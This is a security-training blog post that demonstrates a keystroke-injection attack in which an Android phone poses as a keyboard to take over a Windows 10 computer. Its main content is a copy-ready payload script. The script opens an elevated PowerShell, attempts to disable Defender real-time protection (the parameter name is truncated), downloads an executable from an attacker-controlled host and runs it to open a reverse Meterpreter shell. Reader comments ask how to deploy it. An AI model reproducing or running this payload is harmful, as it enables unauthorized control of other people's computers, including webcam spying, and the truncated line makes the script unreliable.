• Home
  • Hacking & Security
    • Network Hacking
    • Web Hacking
    • Social Engineering
    • Kali Linux
    Submit An Article
  • Courses
    • All Courses
    • Bundles
    • VIP Membership
    • FAQ

    Popular Courses

    Network Hacking Continued – Intermediate to Advanced

    Network Hacking Continued – Intermediate to Advanced

  • Shop
  • Competitions
  • Services
    Penetration Testing
    Consulting
    Code Review
    One on one Training
    Online Courses
    VPN
  • Blog
      • Cart

        0
    VIP Membership
    Got a question?
    [email protected]
    RegisterLogin
    zSecurityzSecurity
    • Home
    • Hacking & Security
      • Network Hacking
      • Web Hacking
      • Social Engineering
      • Kali Linux
      Submit An Article
    • Courses
      • All Courses
      • Bundles
      • VIP Membership
      • FAQ

      Popular Courses

      Network Hacking Continued – Intermediate to Advanced

      Network Hacking Continued – Intermediate to Advanced

    • Shop
    • Competitions
    • Services
      Penetration Testing
      Consulting
      Code Review
      One on one Training
      Online Courses
      VPN
    • Blog
        • Cart

          0

      Hack Windows Using Android – Keystroke Injection

      • Posted by Zaid Sabih
      • Date June 4, 2020

      This video shows a real life example of hacking my friend’s Windows 10 computer using an Android phone, I did this using a keystroke injection attack so when the phone is connected to the target computer it registers itself as a keyboard, then it automatically runs a number of commands to send a reverse meterpreter shell to my Kali Linux machine allowing me to fully control his computer and even turn on his web cam.

       

      GUI r
      DELAY 200
      STRING powershell Start-Process powershell -Verb runAs
      ENTER
      DELAY 2000
      ALT y
      DELAY 900
      STRING Set-MpPreference -DisableRea $true; 
      $d = New-Object System.Net.WebClient; 
      $f = '1.exe'; 
      $d.DownloadFile('http://192.168.1.12/s.exe',$f); 
      $e = New-Object -com shell.application; $e.shellexecute($f); 
      exit;
      • Share:
      author avatar
      Zaid Sabih

      Ethical Hacker, Pentester & Computer Scientist

      Zaid Al-Quraishi is an ethical hacker, computer scientist, and founder of zSecurity. He studied Computer Science at University College Dublin, graduating May 2016. Zaid has a strong background and experience in ethical hacking, starting with video tutorials in 2009 in an ethical hacking community, iSecur1ty.org. He also worked as a penetration tester (pentester) for this company. In 2013 he started teaching his first course online in Arabic which received extremely positive feedback. This motivated him to create an English version of the course. The English course became the most popular and top paid course on Udemy for almost a year, which further motivated Zaid to design and teach more courses on ethical hacking. He now offers a number of courses on ethical hacking and more than 200,000 students on Udemy and other teaching platforms such as StackSocial, StackSkills and zSecurity. Zaid says: "I just love hacking and breaking the rules but don't get me wrong, I am an ethical hacker!"

      Previous post

      Intro to THC Hydra
      June 4, 2020

      Next post

      How To Hack Printers
      June 15, 2020

      You may also like

      SSH-YT-Thumb
      Expose Local Services To The Internet With 1 Command!
      1 April, 2021
      Add a heading (4)
      How Home Security Cameras Get Hacked?
      7 October, 2020
      mysq
      NFS ,SMTP, and MySQL Protocols Explained
      5 October, 2020

        2 Comments

      1. Sithum Nimlaka Abeydheera
        Sithum Nimlaka Abeydheera
        June 4, 2020
        Log in to Reply

        Zaid,
        Can i run this using my normal usb pen drive ?

        Regards,
        Sithum Nimlaka.

      2. Avatar
        j0556105790
        June 4, 2020
        Log in to Reply

        Hi Sir,

        To use this do i have root mobile and copy the script to mobile then copy it to mobile and get connect to computer which we want hack but for WAN we need to port forward it our kali computer.
        I am waiting for your replay.

        Thanks

      Leave A Reply Cancel reply

      You must be logged in to post a comment.

      Categories

      • Cryptography
      • Cryptography
      • CTF
      • Forensics
      • Hacking & Security
      • IOT
      • Kali Linux
      • Network Hacking
      • News
      • OSINT
      • Post Exploitation
      • Post Exploitation
      • Programming
      • Security
      • Social Engineering
      • Uncategorized
      • Web Hacking

      Popular Posts

      Got a Blank Screen After Importing Kali in Virtual Box ? Here’s How To Fix It
      25Jan2018
      How To Start a Fake Access Point (Fake WIFI)
      28Nov2019
      How to Discover Device Manufacturer Based on MAC Address
      28May2018
      HiddenEye – The All in One Phishing Solution
      28Apr2020

      Connect with us

      • Facebook
      • Twitter
      • LinkedIn
      • Instagram
      • Youtube

      “Everything related to ethical hacking

      & cyber security in one place.”

      Quick Links

      • Home
      • About Us
      • Hacking & Security
      • Contact
      • FAQ

      Services

      • Penetration Testing
      • Consulting
      • Code Review
      • One on one training
      • VPN
      • VIP Membership

      Company

      • About Us
      • Contact

      Support

      • FAQ
      • Forums

      Copyright © 2021 zSecurity Ltd. All rights reserved.

      • Privacy
      • Terms

      Contribute

      Share your knowledge with the world

      SUBMIT AN ARTICLE

      Login with your site account

      Lost your password?

      Not a member yet? Register now

      Register a new account

      Are you a member? Login now